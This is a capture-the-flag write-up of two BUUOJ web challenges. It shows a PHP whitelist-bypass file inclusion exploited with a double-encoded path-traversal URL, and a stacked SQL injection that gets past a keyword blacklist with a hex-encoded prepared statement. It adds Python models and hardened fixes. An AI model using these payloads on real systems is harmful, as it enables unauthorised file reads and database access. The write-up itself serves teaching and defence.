Notes on a few good BUUOJ (buuoj.cn) challenges
1. WarmUp
Code audit
Viewing the page source reveals source.php and hint.php
source.php
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        // Only these two files are meant to be includable
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        // 1. exact match against the whitelist
        if (in_array($page, $whitelist)) {
            return true;
        }

        // 2. match the part before the first '?'
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // 3. URL-decode once more, then match the part before the first '?'
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

// Note: the check is made on the derived $_page, but the raw parameter is what gets included
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
hint.php tells us the flag is in ffffllllaaaagggg.php. This brings to mind the SUCTF challenge built on the phpMyAdmin remote file inclusion vulnerability.
The checkFile function in source.php works as follows:
1. A whitelist is defined containing source.php and hint.php.
2. It checks that page is set and is a string; if page is exactly one of the whitelist values, it returns true.
3. It takes the part of page before the first question mark and returns true if that is in the whitelist; then it URL-decodes page once, again takes the part before the first question mark, and returns true if that is in the whitelist.
Note that the server itself URL-decodes the parameter once when it is received. So the underlying payload is hint.php?page=../../../../../../ffffllllaaaagggg; after one round of encoding it becomes hint.php?page=%3f../../../../ffffllllaaaagggg, and after a second round of encoding we get file=hint.php%253f/../../../../../../../../ffffllllaaaagggg
payload: http://web5.buuoj.cn/?file=hint.php%253F/../../../../ffffllllaaaagggg
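To make the root cause of the WarmUp check concrete, here is a Python model of checkFile (an added example, not the challenge's own code) beside the hardened lookup that the page should have used: the whitelist key is mapped to a fixed file name, and that fixed name, never the raw parameter, is what gets included. The whitelist and the sample inputs come from the challenge above; the function names are assumptions for this example.

```python
"""Model of the source.php whitelist check (added example, not the challenge code)."""
from urllib.parse import unquote_plus  # mirrors PHP urldecode(), including '+' -> space

WHITELIST = {"source": "source.php", "hint": "hint.php"}


def _before_question_mark(s: str) -> str:
    # mb_substr($page, 0, mb_strpos($page . '?', '?')): the text up to the first '?'
    return s[: (s + "?").index("?")]


def check_file_original(page) -> bool:
    """Reproduces checkFile. True means source.php would go on to include the RAW $page."""
    if page is None or not isinstance(page, str) or page == "":
        return False
    if page in WHITELIST.values():
        return True
    if _before_question_mark(page) in WHITELIST.values():
        return True
    # The application decodes a second time, after the web server already decoded once,
    # so a '%3F' in the received value turns into '?' and everything after it is ignored
    # by the check but still present in the value that is included.
    decoded = unquote_plus(page)
    if _before_question_mark(decoded) in WHITELIST.values():
        return True
    return False


def hardened_target(page):
    """Defensive variant (assumed design, not the page's): look the request up as a KEY
    of the allowlist and return the fixed file name to include, or None to refuse.
    No substring, no decoding, no path components from the user ever reach include."""
    if not isinstance(page, str):
        return None
    return WHITELIST.get(page)


if __name__ == "__main__":
    # 'hint.php%3F/...' is what PHP sees after the server decoded '%253F' once
    received = "hint.php%3F/../../ffffllllaaaagggg"
    print("original check accepts:", check_file_original(received))  # True, but includes the raw path
    print("hardened lookup returns:", hardened_target(received))      # None
    print("hardened lookup for 'hint':", hardened_target("hint"))     # hint.php
```

The point of the comparison is that the original code validates a value it derives from the input and then includes the input itself; the hardened version validates and includes the same value, so there is nothing left to smuggle past the check.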
2. 随便注 (Easy SQL)
This is an original challenge from the Qiangwang Cup (强网杯).
Testing:
Input 1' gives an error.
Input 1' or 1=1 # returns normally.
Input 1' order by ... # shows there are 2 columns.
Input 1' union select 1,2,3,4 # returns: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
Looking at the filter rule, it blocks select, update and the other commonly used keywords.
A newly learned technique: stacked injection.
Use show and desc to enumerate the database and table structure.
1';show databases;#  (list the databases)
1';show tables;#     (list the tables)
Then query the columns:
1';show columns from `表`;#
Backticks are added around the table name here because the table name is purely numeric and would otherwise not be parsed as an identifier.
This reveals the flag column.
But select is filtered here, so one way to bypass the filter is to run the query through a prepared statement (the hex literal below decodes to select * from `1919810931114514`). payload: http://web16.buuoj.cn/?inject=1%27;SeT%20@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare%20execsql%20from%20@a;execute%20execsql;#
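The challenge's keyword blacklist is the real lesson of this section: it matches a few words and says nothing about stacked statements, so it cannot be fixed by adding more words. The following Python block (an added example, not the challenge's or the page's code) puts the page's preg_match rule next to the defence that actually works, an allowlist on the shape of the input plus a parameterized query. The two-column table is a constructed stand-in for the challenge database, consistent with the order by 2 result above; the function names are assumptions.

```python
"""Blacklist from the challenge vs. allowlist + parameterized query (added example)."""
import re
import sqlite3

# The exact filter printed by the challenge. It checks for a handful of words and
# nothing else, so a statement that uses none of them is passed straight to the database.
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where|\.", re.I)


def blacklist_flags(inject: str) -> bool:
    """True when the challenge's preg_match would reject this input."""
    return BLACKLIST.search(inject) is not None


def make_db() -> sqlite3.Connection:
    # Constructed sample data: an id and a data column, two columns in total
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE words (id INTEGER PRIMARY KEY, data TEXT)")
    conn.executemany("INSERT INTO words VALUES (?, ?)", [(1, "hello"), (2, "world")])
    conn.commit()
    return conn


def safe_lookup(conn: sqlite3.Connection, inject: str) -> list:
    """Defensive lookup: the id must be a decimal number (allowlist on shape), and the
    value is bound as a parameter, so the database never parses user text as SQL.
    Either measure alone would stop every probe shown on the page; together they
    also give a clear rejection path that can be logged."""
    if not inject.isdigit():
        return []
    cur = conn.execute("SELECT id, data FROM words WHERE id = ?", (int(inject),))
    return cur.fetchall()


if __name__ == "__main__":
    conn = make_db()
    for probe in ["1", "1' or 1=1 #", "1' union select 1,2,3,4 #", "1';show databases;#"]:
        print(f"{probe!r:32} blacklist hit: {blacklist_flags(probe)!s:5} rows: {safe_lookup(conn, probe)}")
```

Running it shows the gap directly: the union probe is caught by the regex while the stacked show statement is not, whereas safe_lookup returns a row only for the plain numeric id and an empty result for every injected string, without any keyword list to maintain.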